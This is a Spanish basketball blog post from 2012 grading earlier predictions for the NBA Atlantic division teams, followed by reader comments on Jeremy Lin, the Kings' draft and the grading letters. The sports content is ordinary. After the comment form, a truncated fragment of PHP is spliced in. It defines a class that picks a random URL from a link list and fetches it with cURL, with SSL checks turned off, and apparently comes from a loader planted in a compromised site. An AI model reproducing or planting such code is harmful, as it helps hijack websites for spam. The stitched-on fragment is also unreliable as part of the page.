Revisando los pronósticos 2012: Atlantic

21 de February de 2012 por TheDeerHunter

PHILADELPHIA 76ers

Pronóstico Enero 2012: Sextos del este, primera ronda de playoffs.
Probabilidad de acierto: Media
Calificación pronóstico: C
Análisis

Sólida primera mitad de curso por parte de los hombres de Doug Collins. Primeros de división sobrados, por delante de Celtics o Knicks y con un balance clavado al de sensaciones como Clippers, candidatos en algunas (pocas) quinielas. Pero un matiz importante: jugando bastante bien por momentos y con uno de los mejores balances ataque-defensa de toda la liga.

Parece que nos podemos quedar cortos en nuestro análisis. Tampoco se puede ser muy rotundo, porque no hay mucha gente en Philadelphia que apueste su casa a que pasarán el primer cruce como tampoco es imposible que de repente Lin logre que los Knicks ganen otros 25 partidos seguidos (o los Celtics mejoren) y les hagan caer hasta el 4º-6º puesto del Este.

Sin embargo la clave está en eso, que no se palpa que haya una exigencia real en que le tengan que plantar cara a los cocos de la conferencia. La exigencia es, como decía el análisis, luchar por playoffs y convencer a los hinchas de que es un proyecto que merece la pena. A medio plazo, se supone.

Y todo va muy bien por ese camino. Iguodala es all-star, precisamente cuando menos en plan “estrellita” está jugando. Thaddeus y Lou Williams encabezan la segunda unidad más potente de la liga, Hawes, aún lesionado las últimas semanas, está en campaña llena-cazos y tanto Turner como Vucevic generan optimismo… Personalmente creo que esta autocomplacencia no les beneficia ahora mismo. Las oportunidades hay que aprovecharlas y caer en primera ronda debería de ser una decepción rotunda. Por juego y plantilla deberían entrar en la terna que lucha por la final de conferencia. Otros con menos están soñando con más.

BOSTON CELTICS

Pronóstico Enero 2012: 3º de la conferencia. 2ª ronda de Playoffs.
Probabilidad de acierto: Media
Calificación pronóstico: C+
Ánalisis 

Si hay algo que nos ha enseñado la historia de la liga y la de este equipo es a no darles por vencidos sean cuales sean las circunstancias. Yo, desde luego, no me bajo de ese barco y preferiría pecar por exceso que por defecto, no vaya a quedarme la cara de bobo que se nos quedó a muchos en los playoffs de hace dos años.

No han empezado bien los Celtics, es evidente. En algunos momentos su nivel defensivo ha sido irreconocible, su zona ha evocado a una reunión de plañideras, fuera de casa se han dedicado a hacer amigos y la mayor parte del tiempo la plantilla no puede soportar un calendario tan denso como éste. Demasiadas semanas han deambulado por plazas de lotería. Se avecinan cambios en la franquicia del trébol.

Pero cuidado. Independientemente de las sensaciones, los fríos números indican su verdadero nivel defensivo. Soy de los que creen que Doc Rivers es el mejor técnico en activo y no me parece que marche descalzo a la batalla.

Es bastante posible que el equipo no termine 3º del Este como pronosticamos, pero es impensable que no firmen postemporada y, también, que no sean un hueso duro entonces. Es difícil colocarlos como candidatos y, lo más normal, es que más pronto que tarde terminen jubilados pero a ver quién es el guapo que los desahucia.

Como dijo Jabho en el análisis, el proyecto ya no soporta el favoritismo, pero “quién espere una perita en dulce en los playoffs que busque en otra parte”. Yo en una eliminatoria en la que ellos estén involucrados me lo creo todo.

NEW YORK KNICKS

Pronóstico Enero 2012: Semifinales de conferencia.
Probabilidad de acierto: Aleatoria
Calificación pronóstico: N/D
Ánalisis

Nos encontramos en la zona cero de la explosión kilotónica llamada Jeremy Lin. El jugador nº 467 (de 500) según el nbarank de la ESPN ha dejado con el culo al aire a todos y cada uno de los analistas mundiales. Sin excepción, cualquier pronóstico sobre los Knicks que se hiciera al principio del año está destinado al archivo en la papelera de reciclaje. En el nuestro ni le mencionamos. Pecado mortal. Pero es que cualquiera que se pueda hacer ahora corre el peligro de terminar siendo igual de acertado.

En la montaña rusa que tradicionalmente es la franquicia de Nueva York no puede entenderse este curso sin su impacto. La historia es verdaderamente increíble. Digna incluso del interés de los medios no especializados.

Con el rendimiento de estrellas de la talla de Carmelo Anthony y Amare Stoudemire los Knicks estaban condenados al mayor de los fracasos. Asistimos incrédulos a que el medidor de eficiencia PER de Hollinger marca un 20.3 para Melo, un 16.9 Stat y un 24.3 Lin. Tan sólo 8 partidos de titular en las últimas semanas donde su equipo acumula un 8-2. La mitad de las victorias de esta temporada, la 8ª parte de las derrotas. De la noche a la mañana del desahucio total a las opciones intactas. Asombroso.

¿Semifinales de conferencia? Nah. Mentalidad de pobre. Nadie en el Madison se acuerda que todo se debe a una medida desesperada de D’Antoni. El resultado imprevisto de un simple desquiciado experimento en un punto en el que ya era muy complicado que algo saliera peor. Evoca los 30 minutos por partido a Earl Barron, la dirección a McGrady, aquellos momentos de gloria de Nate Robinson…

El objetivo para algunos es innegociablemente el anillo. Poco importa recuperar a Baron Davis, o cómo les sentará el traje de gregario a Melo y Stat. Vivir en la nube es el estado preferido en la gran manzana y mientras dure hay que disfrutarlo. Si todo hubiera ocurrido un mes antes tendríamos nuevo all-star.

TORONTO RAPTORS

Pronóstico Enero 2012: En torno al 33% de victorias. Fuera de playoffs.
Probabilidad de acierto: Media-baja
Calificación pronóstico: C
Ánalisis

No es que pidiéramos peras al olmo, pero ni por esas. En un equipo donde los minutos de Aaron Gray, Jamal Magloire, Anthoni Carter o Rasual Butler son tenidos en cuenta muy optimista no se puede ser. Ed Davis o DeMar DeRozan suenan entre las grandes decepciones del curso. El año que Bargnani parecía despertar lleva lesionado más de la mitad del mismo. Pocos apostaban a que Calderón seguiría en el equipo a estas alturas y por si fuera poco ya se han apuntado varias derrotas por pura mala suerte. Si ponen un circo…

Sin embargo en todo el despropósito que rodea la franquicia se vislumbra algún punto positivo. Dwane Casey ha logrado insuflar un punto de personalidad a lo que en condiciones normales debería de ser una banda lamentable. A pesar de todo no son lo peor de esta liga. Al contrario de lo que se puede pensar defienden razonablemente bien e incluso, en ciertos momentos de la competición se han mostrado peligrosos. Creemos que en condiciones normales estarían firmando bastante mejor balance. Si acaso lo más que se le puede reprochar es no haber encontrado el punto de sus jugadores jóvenes.

En el fondo de todo sí acertó de pleno el pronóstico: “sin mucho presente, un futuro cuanto menos dudoso y una serie de jugadores jóvenes que yendo todo bien aspirarían a acomodarse entre la clase media de la liga. Su objetivo debería ser empezar a coleccionar rondas.”

NEW JERSEY NETS

Pronóstico Enero 2012: Fuera de playoffs.
Probabilidad de acierto: Total
Calificación pronóstico: A
Análisis

Ante el panorama de precariedad que se vive en New Jersey es imposible centrarse en un presente.

Brooklyn, Prokhorov, promesas de jugadores y proyectos… a algo hay que agarrarse en una campaña tan gris como el color del balón en el escudo de la franquicia. Con 3 victorias contadas que ha podido disfrutar el respetable del Prudential Center este curso, con la posibilidad de que su jugador estrella tome las de Villadiego en cuanto tenga ocasión, al igual que su flamante magnate-propietario… es perfectamente entendible que se hayan contagiado del estado de ensoñación permanente a la que estaban (¿están?) acostumbrados sus vecinos ricos.

Posibilidades haberlas “haylas”. Tantas como su margen salarial, el dinero y un nuevo horizonte comercial puedan comprar. Sólo el tiempo podrá resolver todas las incógnitas abiertas.

De momento, y aunque pueda ser lo de menos, aprovechable rendimiento de MarShon Brooks y de alguna de sus actuales piezas. Y algunas cosas nunca cambian: Hace 2 noches volvía Brook Lopez de su larga lesión para atrapar 2 rebotes.

Comenta

27 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    En general, pocas, o ninguna sorpresa en el Atlántico. Lo más destable sería el batacazo de NYK de no ser por Lin, que ha estabilizado el análisis de Dirk. A pesar de lo irregulares de Knicks y Celtics, mantendrán sin problemas el 7º y 8º puesto de conferencia, aunque Cleveland, Milwaukee y Detroit no les van a dejar relajarse. Por primera vez en algunos años el Este mantiene 50% o más de victorias en todos los clasificados para Playoffs. Ya era hora…

      Citar

  2. Nacho dice:
    #2

    Sancho88: En general, pocas, o ninguna sorpresa en el Atlántico. Lo más destable sería el batacazo de NYK de no ser por Lin, que ha estabilizado el análisis de Dirk. A pesar de lo irregulares de Knicks y Celtics, mantendrán sin problemas el 7º y 8º puesto de conferencia, aunque Cleveland, Milwaukee y Detroit no les van a dejar relajarse. Por primera vez en algunos años el Este mantiene 50% o más de victorias en todos los clasificados para Playoffs. Ya era hora…

    A día de hoy, NYK y Boston, están por debajo del 50%, osea, que la hora todavía no es.
    Sigo pensando que con Bargnani sano, y al nivel que estaba mostrando, Toronto estaría muy muy cerca de PO en estos momentos. Tienen un pedazo entrenador.
    En lo que estoy totalmente de acuerdo con Deer es en lo de Doc Rivers. Karl, Adelman, Popovich… son pedazo entrenadores, (para flipar donde están sus equipos, y donde estarían sin ellos), pero Doc apunta la mejor lectura de partido en vivo. Yo seguiría sin querer jugármela con ellos en PO. Aunque habrá que tener en cuenta si realizan algún trade. Porque eso los puede situar, o los puede hundir.

      Citar

  3. Viva_Dirk dice:
    #3

    Si Baron Davis vuelve bien mantengo mi pronóstico, aunque hay que ver como se adaptan Melo&Stat a la situación de Lin, como no la controlen debidamente puede ser contraproducente para el equipo.

      Citar

  4. Sancho88 dice:
    #4

    Bueno, por 1 victoria… pero la progresión yo creo que sí es esa, que todos entren por encima del 50%. Boston lleva una racha muy mala, y aún así está cerca de esa marca, y Knicks viene con racha muy positiva, y a pesar de la derrota de ayer, creo que la progresión es hacia arriba. Y los demás, no creo que nadie se meta un batacazo. Indiana me genera algunas dudas, pero en ningún caso para quedarse fuera de playoffs ni perder ese balance positivo

      Citar

  5. Nacho dice:
    #5

    Lo bueno del Este es que los 8 no tienen a nadie que realmente les presione. Yo creo que Indiana y Philly irán del 5º para abajo, y las hostias serán para no quedar 7º y 8º, porque todos saben que son habas contadas, salvo para los verdes, que a esos les da igual; son capaces de perder una serie contra Atlanta porque se sienten viejos, y liársela a Miami porque se sienten rejuvenecer.

      Citar

  6. melo15 dice:
    #6

    Eso es verdad, va haber una lucha flipante por no quedar 8 o 7 por que es eliminacion, casi segura, espero que los Knicks, consigan quedar de 6 para arriba, yo creo que lo podemos conseguir, Miami, Chicago, Orlando, Atlanta, pero yo creo que podemos acabar 5, pero yo prefiero acabar 6 porque si no en segundo Ronda contra Miami y a casa.
    La clave de estos Raptors, es Bargnani, que NO es pivot, muy acertada la maniobra de ponerlo de ala-pivot, y poner con el un pivot rocoso, que se mate por los rebotes, con DeRozan, por fuera, Calderon dirigiendo, tienen equipo.
    A baron ya lo necesitamos, tenemos a Lin, que tiene que jugar 30 minutos, que los demas se peleen por las migas
    Este chico ha demostrado que puede ser titular, no se la puedes arrebatar ahora, porque vuelve una vieja gloria, como Davis, y relegarle al banquillo, no seria justo

      Citar

  7. Sancho88 dice:
    #7

    Bueno, creo que es muy osado llamar vieja gloria a Davis…. xd. aunque tienes razón en que Lin se ha ganado la titularidad, eso está claro

      Citar

  8. Denise dice:
    #8

    Nacho: A día de hoy, NYK y Boston, están por debajo del
    Sigo pensando que con Bargnani sano, y al nivel que estaba mostrando, Toronto estaría muy muy cerca de PO en estos momentos. Tienen un pedazo entrenador.

    Que Toronto estuviera cerca de playoffs dice mucho de la basura de nivel que hay en el Este.

    Pues porque Varejao se ha lesionado, pero con lo bien que estaba jugando el brasileño junto con Irving, Jamison y Sessions a gran nivel, yo creo que hubieran tenido bastantes opciones de hacerse con una plaza de Playoffs.

      Citar

  9. Esteban dice:
    #9

    que los clippers no son candidatos es ahora, con billups y martin, solo les faltaba un alero que mejorara de gomes y no tenian nada que envidiarles a nadie

    obvio que ahora pierdes, a mi entender el segundo mejor jugador del equipo, el segundo hombre de anotaciones dificiles en partidos cerrados y no te refuerzas con nada, es logico que no sean contendientes ahora

      Citar

  10. Esteban dice:
    #10

    como hacemos para llevar a john salmons a los clippers?

      Citar

  11. Sancho88 dice:
    #11

    Son 5 kilos, creo. A los Maloof les dices que les ahorras esos millones, y te lo sueltan por alguna ronda del draft, seguro

      Citar

  12. Sancho88 dice:
    #12

    No, lo acabo de mirar. Casi 9 kilos comprometidos al menos hasta 2014… no creo que os interese, jeje. Además, son 33 castañas las que tiene. No comprendo ese movimiento por parte de los Kings. Soltaron a Beno Udrih, que les venía bien para la dirección de juego, visto lo visto, y teniendo a Thornton-Evans-Fredette, y Greene-García-Outlaw, Salmons sobraba. Un movimiento caca, y además Udrih jugando poquísimo en Milwaukee…

      Citar

  13. ALexxxx dice:
    #13

    Hola, alguien sabe como puedo descargarme la aplicación de este blog en market? antes la tenia en el movil ahora ya no :S

    gracias.

      Citar

  14. melo15 dice:
    #14

    Sancho la cagada que hicieron estos Kings, es draftear a Fredette, parece que les gusto mucho el Work-+out que hizo, tendrian que haber drafteao a Kemba, que es lo mas parecido a abase que quedaba, y les quedaria un equipo asi: Kemba-Tyreke-Garcia-Hickson-Cousins y en el banco: Thomas-Thorton-Outlaw, Green-Thompson, se pillan un alero en el draft y a Playoffs

      Citar

  15. Denise dice:
    #15

    melo15:
    Sancho la cagada que hicieron estos Kings, es draftear a Fredette, parece que les gusto mucho el Work-+out que hizo, tendrian que haber drafteao a Kemba, que es lo mas parecido a abase que quedaba, y les quedaria un equipo asi: Kemba-Tyreke-Garcia-Hickson-Cousins y en el banco: Thomas-Thorton-Outlaw, Green-Thompson, se pillan un alero en el draft y a Playoffs

    Melo, con ese equipo creo que tampoco entras en Playoffs en el Oeste

      Citar

  16. Txusma dice:
    #16

    Pero Sacramento juega en el Este? 😀
    A toro pasado les hubiera ido mejor draftear a Kawhi Leonard y no sé si mantener a Udrih. El esloveno es más anotador que director. El rookie Isiah Thomas no lo está haciendo nada mal.
    Lo q no entiendo es pq juega tan poco Honeycutt, en la universidad me pareció un tío completísimo capaz de aportar en muchísimas facetas del juego. A lo mejor es tan completo que no hace nada mal pero tampoco nada bien…

      Citar

  17. Sancho88 dice:
    #17

    No le ha dado ninguna oportunidad a Honeycutt, y tiene todo, realmente. Físico, agilidad, defensa, salto vertical, tiro exterior… y nada, creo que le ha sacado 5 minutos en todo el año, o menos. Una pena. Y sí, tenían que haberse quedado con Kemba, pienso yo… Ya dije en el análisis que Fredette iba a tener muchas dificultades en la liga por su altura… aunque tampoco es para que no juegue nada. El equipo juega mucho mejor con Smart, pero se ha olvidado de los rookies.

    Txus, quién ha dicho que Sacramento juegue en el Este¿?¿??

      Citar

  18. Sancho88 dice:
    #18

    Y con físico me refiero a que es un tío fibroso, un poco Tayshun Prince, pero le hace falta ganar peso en músculo, eso es cierto

      Citar

  19. infante dice:
    #19

    Sancho88:
    No le ha dado ninguna oportunidad a Honeycutt, y tiene todo, realmente. Físico, agilidad, defensa, salto vertical, tiro exterior… y nada, creo que le ha sacado 5 minutos en todo el año, o menos. Una pena. Y sí, tenían que haberse quedado con Kemba, pienso yo… Ya dije en el análisis que Fredette iba a tener muchas dificultades en la liga por su altura… aunque tampoco es para que no juegue nada. El equipo juega mucho mejor con Smart, pero se ha olvidado de los rookies.

    Txus, quién ha dicho que Sacramento juegue en el Este¿?¿??

    y Isaiah Thomas que es, el vecino de enfrente?
    seriamente, los tios Korver o Kapono nunca triunfaran en la NBA, bastante tiene para en sus 10 minutos tirarse sus mierdas y si entran bien y si no, tambien
    de Honeycutt no tengo referentes, de que universidad venia?

      Citar

  20. Txusma dice:
    #20

    Honeycutt jugaba en UCLA.
    Lo de Sacramento en el Este lo decía pq el artículo iba sobre la Atlantic Division y hemos acabado hablando de Sacramento… 😀

      Citar

  21. Sancho88 dice:
    #21

    JAJJAAJ, ha sido por lo que comentaba Esteban de Salmons. Se nos ha ido de las manos, ciértamente, jajja. Y bueno, para terminar, por mi parte. Mejor me lo pones Infante con lo de Thomas. Realmente, no era ninguna locura draftear dos bases para Kings, ya que sin Udrih se quedaban sin bases puros en la plantilla, y con Kemba-Thomas habría una dirección de lujo, con Evans asumiendo también algunas jugadas. Le habría quedado un equipo muy majete a los Kings con Kemba en vez de Fredette. Como bien dices, los tiradores puros suelen fracasar. Y ojo, que Fredette yo creo que sabe hacer más cosas, pero no es demasiado inteligente en lectura de juego, además del hándicap de su altura, lógicamente. Thomas cada vez se me parece más al primigenio Nate Robinson. Anota con una facilidad asombrosa, y cuando lo quieres mirar a ver cuántos puntos lleva, ya ha pasado de 20. A Thornton tb le pasa, pero el pobre es más egoísta que otra cosa, y eso le lastra, ciertamente, porque es un jugadorazo impresionante, y si decidiera jugar un poco más en equipo, sería la leche, directamente. Tiene una de las muñecas más efectivas de la liga en momentos jodidos. La mete, y punto. Le da igual quien le defienda, él se motiva a sí mismo. Ayer jugó Whiteside dos minutos, y puso un par de chapas además de dos rebotes. Creo que sería el recambio ideal de Cousins, porque intimida más que Hayes. Y en el apartado de decepciones mayúsculas de la temporada, el señor JJ Hickson se lleva la palma. De ser jugador franquicia en los Cavs el año pasado, con casi 14 puntos y 9 rebotes por partido, jugando 30 minutos, este año no llega ni a 20 minutos, con 5 puntos y 5 rebotes. No ha sabido ganarse el puesto de titular, y es una pena, porque lo tenía todo a favor. Espero que resurja en el impass del All Star y vuelva un poco por sus fueros del año pasado. Ah, y es curioso, este año no ha salido ningún mensaje por aquí para Josh Howard, de los Jazz. Tan perdido de la vida le damos que ya no le caen ni palos? xd. Coño, hace tres-cuatro años se nos caía la babilla en los Mavericks con él. Y luego en Wizards tampoco lo hizo tan mal. Alguien sabe qué coño le pasa? Se lesionó el año pasado y ahora no es ni un 10% de lo que fue en Dallas, igual que Butler en comparación con sus años buenos en Wizards. Tengo la impresión que muchos cogen la pasta y luego ya se cansan de jugar, royo Keon Clark. El ejemplo de profesionalidad, en el lado opuesto, sería Antawn Jamison, que siempre ha rendido independientemente del equipo en el que le haya tocado jugar. Creo que en muchos casos, no se puede decir que dan un bajón físico que no les deja jugar como a los 25 años, sino que se vuelven perezosos y no quieren saber nada.

      Citar

  22. melo15 dice:
    #22

    Si Honeycutt es bastante bueno, pero Fredette no esta a la altura, los Kings lo habian hecho muy bien hasta ahora en el Draf, primero escogiendo a Tyreke cuando todo el mundo decia que tenian que escoger a Ricky y despues a Cousins y ahora….Cagada, con Kemba les salia un equipazo

      Citar

  23. olarte dice:
    #23

    que significan las letras de la calificacion? como va el orden? gracias

      Citar

  24. Sancho88 dice:
    #24

    A – Superior, es decir, sobresaliente.

    B- Por encima de la media, notable.

    C- Sobre la media, es decir, aprobadillo, con las diferentes connotaciones de C+, que sería bien o C -, que sería suficiente, aprobado por los pelos. Al igual que A+ es matrícula de honor y A- sobresaliente bajo, notable alto, etc.

    D- Por debajo de la media, es decir, insuficiente.

    F- Fallido. Supenso con todas las ganas. Un F- serían los Hornets, por ejemplo. Un desastre con patas

      Citar

  25. Sancho88 dice:
    #25

    Ah, y no sé si las traducciones a las notas españolas son así, pero más o menos me puedo imaginar que sí, por la traducción. De todas maneras, puedes mirarte el informe de mitad de temporada que hace la NBA, y así podrás calibrar mejor las notas que les ponen y saber cuando ponen C+, o C-

    http://www.nba.com/reportcard/midseason/2011/

    Aunque aquí, lo que está haciendo Deer es calificar el grado de acierto del análisis, no la actuación en sí de los equipos

      Citar

  26. Blade Petrovic dice:
    #26

    A mí no lu unico que me mola de los Nets es look de Deron a la Baron

      Citar

  27. Kenji93 dice:
    #27

    Nadie se da cuenta que los sixers con, la plantilla completa, son mejores que los knicks y los celtics? El record de los sixers con hawes es de 12-2 y sin el 8-11

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>